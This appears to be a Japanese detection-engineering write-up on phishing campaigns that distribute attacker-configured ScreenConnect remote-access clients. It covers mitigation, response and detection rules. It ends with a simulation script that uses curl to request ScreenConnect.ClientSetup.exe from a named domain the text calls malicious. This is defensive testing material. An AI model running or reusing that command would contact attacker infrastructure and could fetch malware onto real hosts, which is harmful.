ScreenConnectクライアントの悪用による不正遠隔アクセスの発生
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
攻撃者はフィッシングメールを利用して、正規の事前設定されたScreenConnectクライアントを配布しています。このリモートモニタリングと管理(RMM)ツールは、攻撃者が管理するインスタンスへのコールバック接続を確立し、侵害されたシステムにリモートアクセスを提供します。このキャンペーンは、正規ソフトウェアの信頼性を悪用して、基本的なセキュリティ制御と検出メカニズムを回避します。
調査
調査官は、PEファイルを配信するリンクを含むフィッシングメールを調査しました。分析により、このファイルが正規かつデジタル署名されたScreenConnectクライアントであることが確認されました。しかし、その埋め込み構成が脅威アクターによって管理されている特定のリレーインスタンスとインスタンスIDに接続するように変更されていました。
緩和措置
ブラウザは初期の保護層として実行可能ファイルのダウンロードをブロックすることがあります。組織はRMMツールの不正使用を監視し、信頼できないウェブリンクからダウンロードされた実行ファイルに厳格な制御を施すべきです。アプリケーションの許可リストを用いることで、不正なScreenConnectクライアントやその他の未承認のRMMソフトウェアの実行を防ぐこともできます。
対応
不正な活動が検出された場合、攻撃者による継続的なリモートアクセスを防止するために、影響を受けたエンドポイントを隔離します。すべてのアクティブなScreenConnectプロセスを識別して終了します。クライアントの構成を法医学的にレビューして、攻撃者のコマンドアンドコントロールのインフラストラクチャを特定し、侵害されたシステムへの不正アクセスの範囲を決定します。
攻撃フロー
この部分はまだ更新中です。
検出
代替リモートアクセス/管理ソフトウェア(プロセス作成経由)
リモートアクセスソフトウェアドメイン通信試行による可能性のあるコマンドアンドコントロール活動(DNS経由)
フィッシングメールによるScreenConnectクライアントマルウェア配布[HTTPプロキシ]
シミュレーション実行
-
攻撃の流れ & コマンド: 敵対者は、フィッシングキャンペーンを通じてターゲットワークステーションにScreenConnectを配布し、持続性を確立することを目的としています。このシミュレーションでは、最終段階を再現し、被害者の機械が設定実行ファイルをダウンロードするために悪用された/悪意あるドメインに対してアウトバウンドHTTPリクエストを行います。脅威インテリジェンスで特定された特定の挙動を模倣するために、「攻撃者」はカスタムのUser-Agent文字列を使用します
ScreenConnect特定のファイルパスをリクエストしながらthelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe。これにより、プロキシベースの検出ルールがトリガーされます。 -
回帰テストスクリプト:
# このスクリプトは、検出ルールで特定された悪意あるダウンロードリクエストを模倣するためにcurlを使用します。 # 警告をトリガーするための特定のURLと特定のUser-Agentを使用します。 TARGET_URL="http://thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe" MALICIOUS_UA="ScreenConnect" echo "[*] ScreenConnectダウンロード試行をシミュレート中..." echo "[*] URL: $TARGET_URL" echo "[*] User-Agent: $MALICIOUS_UA" # 自己署名証明書を使用するシミュレーションドメインのSSLエラーを無視するには-kを使用し、 # 特定のUser-Agentを設定するには-Aを使用します。 curl -k -A "$MALICIOUS_UA" "$TARGET_URL" -o /dev/null echo "[*] シミュレーションコマンドが送信されました。" -
クリーンアップコマンド:
# シミュレーションではホストに実際のファイルはダウンロードされていません(/dev/nullにリダイレクト)。 # システムの変更はありません。 echo "[*] クリーンアップ完了。ホストに痕跡は残りません。"